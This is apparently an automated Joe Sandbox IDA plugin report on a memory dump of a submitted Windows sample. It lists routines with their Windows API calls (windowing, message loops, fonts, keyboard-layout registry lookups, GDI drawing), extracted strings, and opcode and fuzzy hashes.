                                                                                                    • Instruction ID: 334f047361db9933a884c8a8f58c7ee22c5d7211a9888722912725691a3f8b23
                                                                                                    • Opcode Fuzzy Hash: 3d5573c445a8be8317e21363896d4081c1771d5ae05af0a9fb1147a040ee48b0
                                                                                                    • Instruction Fuzzy Hash: C6512A74A00209EFEB10DF98C9C5AAEB7F5EF45314F2086A0E950EB294D774BE45CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 041554A8: GetActiveWindow.USER32 ref: 041554CF
                                                                                                      • Part of subcall function 041554A8: GetLastActivePopup.USER32(?), ref: 041554E1
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0415417E
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 041541B6
                                                                                                    • MessageBoxA.USER32(00000000,?,?,?), ref: 041541F5
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0415426B), ref: 04154245
                                                                                                    • SetActiveWindow.USER32(00000000,0415426B), ref: 04154256
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Active$LastMessagePopupRect
                                                                                                    • String ID: (
                                                                                                    • API String ID: 3456420849-3887548279
                                                                                                    • Opcode ID: 285c1308261285c4b0eaba5c6b945591e101842aff428d5d5d3d49dd5a67d6fb
                                                                                                    • Instruction ID: 1cd87428bf0fe225fdd388974ecee9566edb9e7b7dd3db44e78e784f8c2e4769
                                                                                                    • Opcode Fuzzy Hash: 285c1308261285c4b0eaba5c6b945591e101842aff428d5d5d3d49dd5a67d6fb
                                                                                                    • Instruction Fuzzy Hash: 4A51D775A00218EFEB04DBA9DD81FAEB7B9EB88304F148455E915EB2A1DB74BD408B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetKeyboardLayoutList.USER32(00000040,?,00000000,04151B83,?,0293D9D0,?,04151BE5,00000000,?,0413D22F), ref: 04151A2E
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 04151A96
                                                                                                    • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,04151B3F,?,80000002,00000000), ref: 04151AD0
                                                                                                    • RegCloseKey.ADVAPI32(?,04151B46,00000000,?,00000100,00000000,04151B3F,?,80000002,00000000), ref: 04151B39
                                                                                                    Strings
                                                                                                    • layout text, xrefs: 04151AC7
                                                                                                    • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 04151A80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                    • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                    • API String ID: 1703357764-2652665750
                                                                                                    • Opcode ID: eeff7fee601d41162a859e79f885b88c1e311009229d19876177cb08a3ce6a41
                                                                                                    • Instruction ID: 25233f256c3a510ffd477ee41913fdaa1fc8be37248149e352ac5e50f0f050c7
                                                                                                    • Opcode Fuzzy Hash: eeff7fee601d41162a859e79f885b88c1e311009229d19876177cb08a3ce6a41
                                                                                                    • Instruction Fuzzy Hash: 29410574A00209EFEB11DF94C9C0BDEB7F9EB48704F5184E5E914A72A1E7B0AE44CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 04153E00
                                                                                                    • IsWindowUnicode.USER32 ref: 04153E14
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04153E35
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04153E4B
                                                                                                    • TranslateMessage.USER32 ref: 04153ED4
                                                                                                    • DispatchMessageW.USER32 ref: 04153EE0
                                                                                                    • DispatchMessageA.USER32 ref: 04153EE8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2190272339-0
                                                                                                    • Opcode ID: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
                                                                                                    • Instruction ID: fe8e93366be482badf01f4b8cbd8cdcf4e42f0c057b38ff242852ded945e09db
                                                                                                    • Opcode Fuzzy Hash: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
                                                                                                    • Instruction Fuzzy Hash: A221E630708348E7FA316A280DC1BFF92D98F92BC8F144499FDB1971E2D7E5B4464126
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0414D161
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0414D173
                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 0414D186
                                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0414D1C6
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,?), ref: 0414D1DA
                                                                                                    • SetClassLongA.USER32(00000000,000000E6,?), ref: 0414D1EE
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 0414D20A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Long$Window$Class
                                                                                                    • String ID:
                                                                                                    • API String ID: 2026531576-0
                                                                                                    • Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                    • Instruction ID: adb9452815df8c5db94a1eb7599337e55a68ab2434b7e049d7c960691bfbbeef
                                                                                                    • Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                    • Instruction Fuzzy Hash: 9421537430828176EA05B77C9CC8ABEB7995FC121CF1886A4F864DB2D0CBB4F846D761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 04151D79
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 04151D86
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 04151D9C
                                                                                                      • Part of subcall function 04122518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04122525
                                                                                                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 04151DC5
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 04151DD5
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 04151DEE
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 04151E14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2891467149-0
                                                                                                    • Opcode ID: 898e4b959d762921e4e3941335b82f14c032df72580d1836e3d65a32e2ac7bfa
                                                                                                    • Instruction ID: fb033d77dd08129b595f1d43d6b2e3d5ca68814f8c286f1aff068b85f8af5a83
                                                                                                    • Opcode Fuzzy Hash: 898e4b959d762921e4e3941335b82f14c032df72580d1836e3d65a32e2ac7bfa
                                                                                                    • Instruction Fuzzy Hash: F2318E30B05684ABFB55EB64D9C6BD932E4EB44304F8580B0A948DA295EF78BD49CB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0410C91C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,0410C9F2), ref: 0410C95E
                                                                                                      • Part of subcall function 0410C91C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,0410C9D5,?,00000000,?,00000000,0410C9F2), ref: 0410C993
                                                                                                      • Part of subcall function 0410C91C: VerQueryValueA.VERSION(?,0410CA04,?,?,00000000,?,00000000,?,00000000,0410C9D5,?,00000000,?,00000000,0410C9F2), ref: 0410C9AD
                                                                                                    • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 04156CA4
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 04156CB5
                                                                                                    • ImageList_Write.COMCTL32(00000000,?,00000000,04156D6A), ref: 04156D34
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
                                                                                                    • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                    • API String ID: 4063495462-3125200627
                                                                                                    • Opcode ID: eaedb8a56f0bd4ce9b4d3e33420886db145927bb207fd6e3e22213dcccf734a1
                                                                                                    • Instruction ID: 0d91ddda0dd6382ccd2eef3ac994c27499aa1d57caaade0cd2b96f610b73a347
                                                                                                    • Opcode Fuzzy Hash: eaedb8a56f0bd4ce9b4d3e33420886db145927bb207fd6e3e22213dcccf734a1
                                                                                                    • Instruction Fuzzy Hash: E221C730300280EBE714AF79C9C5BA977B9DB40348B804564EC68D32B0DBB6BC44DA90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetKeyboardLayoutNameA.USER32(00000000), ref: 04133030
                                                                                                      • Part of subcall function 041202A4: RegCloseKey.ADVAPI32(10940000,04120180,00000001,04120222,?,?,041276BA,00000008,00000060,00000048,00000000,0412775F), ref: 041202B8
                                                                                                      • Part of subcall function 04120308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,041204A2), ref: 04120374
                                                                                                      • Part of subcall function 0410DC04: SetErrorMode.KERNEL32 ref: 0410DC0E
                                                                                                      • Part of subcall function 0410DC04: LoadLibraryA.KERNEL32(00000000,00000000,0410DC58,?,00000000,0410DC76), ref: 0410DC3D
                                                                                                    • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 041330C1
                                                                                                    • FreeLibrary.KERNEL32(?,041330FB,?,00000000,0413313B), ref: 041330EE
                                                                                                    Strings
                                                                                                    • KbdLayerDescriptor, xrefs: 041330B8
                                                                                                    • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 04133075
                                                                                                    • Layout File, xrefs: 0413308D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
                                                                                                    • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                                                                                    • API String ID: 3365787578-2194312379
                                                                                                    • Opcode ID: 534aa291d1412b08186ec57029db91f10b9438f0a0ea42c541b3eab287a7688c
                                                                                                    • Instruction ID: 209547b28fa6c11386d8fc65c83bfa78fc9752962a5bbc198035f17d00e08707
                                                                                                    • Opcode Fuzzy Hash: 534aa291d1412b08186ec57029db91f10b9438f0a0ea42c541b3eab287a7688c
                                                                                                    • Instruction Fuzzy Hash: 9521BD70E00249AFEF01EFA4C9D199EBBB6EB4D304F408464E910E7640DB79BD55CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0412B0FC
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0412B111
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0412B11C
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0412B146
                                                                                                      • Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfoA
                                                                                                    • API String ID: 2545840971-1370492664
                                                                                                    • Opcode ID: fa08404d99babf207a96c314e6bc9c935741a83d7c8722a50a033695ccfe3192
                                                                                                    • Instruction ID: fb9bdd21b6d3f06b8c6266234eacfea4597c82279c0fc8bfc73a6c013181dbc8
                                                                                                    • Opcode Fuzzy Hash: fa08404d99babf207a96c314e6bc9c935741a83d7c8722a50a033695ccfe3192
                                                                                                    • Instruction Fuzzy Hash: 1F11AF317043649FE720CF65AA847A7B7F8EF05790F004529E955E7280D7B8BC948BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0412B1D0
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0412B1E5
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0412B1F0
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0412B21A
                                                                                                      • Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfoW
                                                                                                    • API String ID: 2545840971-2774842281
                                                                                                    • Opcode ID: f101207c6c3e58d6406ac8b728ca09cb4933c978ae161edbcd1f0ff0b4bb3cd7
                                                                                                    • Instruction ID: fb317f396fb55446c6a5518c7ff5104b8cda66bf577bf9a858e4ed323e567fb2
                                                                                                    • Opcode Fuzzy Hash: f101207c6c3e58d6406ac8b728ca09cb4933c978ae161edbcd1f0ff0b4bb3cd7
                                                                                                    • Instruction Fuzzy Hash: 9711AF317053605FE760CF659A84BABB7E8EF05751F004529ED55E7240D7B4BC98CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 04123C9C: GetObjectA.GDI32(?,00000004), ref: 04123CB3
                                                                                                      • Part of subcall function 04123C9C: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 04123CD6
                                                                                                    • GetDC.USER32(00000000), ref: 04124EB2
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 04124EBE
                                                                                                    • SelectObject.GDI32(?), ref: 04124ECB
                                                                                                    • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,04124F23,?,?,?,?,00000000), ref: 04124EEF
                                                                                                    • SelectObject.GDI32(?,?), ref: 04124F09
                                                                                                    • DeleteDC.GDI32(?), ref: 04124F12
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 04124F1D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                                    • String ID:
                                                                                                    • API String ID: 4046155103-0
                                                                                                    • Opcode ID: 1fdd6597016252cd8efd677dbfa7f59010a2b788917aba5f5610136fae185916
                                                                                                    • Instruction ID: a75417a2d92c4f69c1f0cd5838b2321c6fd51bec99752047f83c496efa4d1537
                                                                                                    • Opcode Fuzzy Hash: 1fdd6597016252cd8efd677dbfa7f59010a2b788917aba5f5610136fae185916
                                                                                                    • Instruction Fuzzy Hash: FD112471E04319ABEB10EBE8CD90AAEB3FCFB48704F0084A5B514D7280D7B5B9508B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32 ref: 04151CA3
                                                                                                    • WindowFromPoint.USER32(?,?), ref: 04151CB0
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 04151CBE
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04151CC5
                                                                                                    • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 04151CEE
                                                                                                    • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 04151D00
                                                                                                    • SetCursor.USER32(00000000), ref: 04151D12
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1770779139-0
                                                                                                    • Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                    • Instruction ID: ee3640afe41435ecd02c81d1da43712c46afa530919d3d4c36f631c954c48188
                                                                                                    • Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                    • Instruction Fuzzy Hash: 1401F535204380B5E7223B648CC8F7F76A8DF85A99F108459F9989A1E0F775FC009326
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0410BE3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0410BE59
                                                                                                      • Part of subcall function 0410BE3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0410BE7D
                                                                                                      • Part of subcall function 0410BE3C: GetModuleFileNameA.KERNEL32(04100000,?,00000105), ref: 0410BE98
                                                                                                      • Part of subcall function 0410BE3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0410BF2E
                                                                                                    • CharToOemA.USER32(?,?), ref: 0410BFFB
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0410C018
                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0410C01E
                                                                                                    • GetStdHandle.KERNEL32(000000F4,0410C088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0410C033
                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,0410C088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0410C039
                                                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0410C05B
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0410C071
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 185507032-0
                                                                                                    • Opcode ID: 5109d55bfeb65ddda46193cc9d10d95c5bd6552ffeb91bc2503e9a81d1e2a526
                                                                                                    • Instruction ID: 2449875ee5d9fd76b47d9a8b09455b5ccfce75266c55ed44b91f15e0ce31c4a7
                                                                                                    • Opcode Fuzzy Hash: 5109d55bfeb65ddda46193cc9d10d95c5bd6552ffeb91bc2503e9a81d1e2a526
                                                                                                    • Instruction Fuzzy Hash: 9C1136B2208204AAE200FBA4CCC4F9B7BACAB45704F408619B754D61D0EBB5FD448B76
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FillRect.USER32(?,?), ref: 0414CAE5
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0414CB10
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 0414CB2F
                                                                                                      • Part of subcall function 0414C9E0: CallWindowProcA.USER32(?,?,?,?,?), ref: 0414CA1A
                                                                                                    • BeginPaint.USER32(?,?), ref: 0414CBA7
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0414CBD4
                                                                                                    • EndPaint.USER32(?,?,0414CC48), ref: 0414CC34
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 901200654-0
                                                                                                    • Opcode ID: 9cfc5a8a117a18e4b2d3244705351a5845b3aabe01a0a18e1c159ee009384f3e
                                                                                                    • Instruction ID: 1a9c4234c45338dd353840f77f7032ba11a26dfc49211e62f2e147f0a3ba6984
                                                                                                    • Opcode Fuzzy Hash: 9cfc5a8a117a18e4b2d3244705351a5845b3aabe01a0a18e1c159ee009384f3e
                                                                                                    • Instruction Fuzzy Hash: 7B51D374A01208EFDB04DFA8C588E9DB7F9AF49314F2681A5E408EB261E734BA45DF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0410F991
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0410F9AD
                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0410F9E6
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0410FA63
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0410FA7C
                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 0410FAB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 351091851-0
                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction ID: cb86d303a1fdfcfc2cc829e884ca61407b41d2dc66b5382087d1c9c716953709
